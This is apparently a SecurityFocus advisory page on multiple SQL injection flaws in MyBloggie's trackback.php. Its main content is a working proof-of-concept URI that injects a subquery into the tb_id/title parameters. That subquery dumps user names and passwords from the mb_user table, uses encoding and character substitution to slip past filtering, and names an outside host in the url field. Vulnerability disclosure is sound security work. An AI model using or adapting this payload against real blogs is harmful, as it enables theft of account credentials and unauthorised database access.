Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

MyBloggie Trackback.PHP Multiple SQL Injection Vulnerabilities

Attackers can exploit these issues via a browser.

The following proof-of-concept URI and exploit code have been provided:

http://www.example.com//trackback.php?tb_id=2&title=%2527,+comments=(SELECT+C0NCAT(user,CHAR(58),password)+FR0M+mb_user)/*&url=http://jmp-esp.kicks-ass.net&excerpt=pwnz







 

Privacy Statement
Copyright 2009, SecurityFocus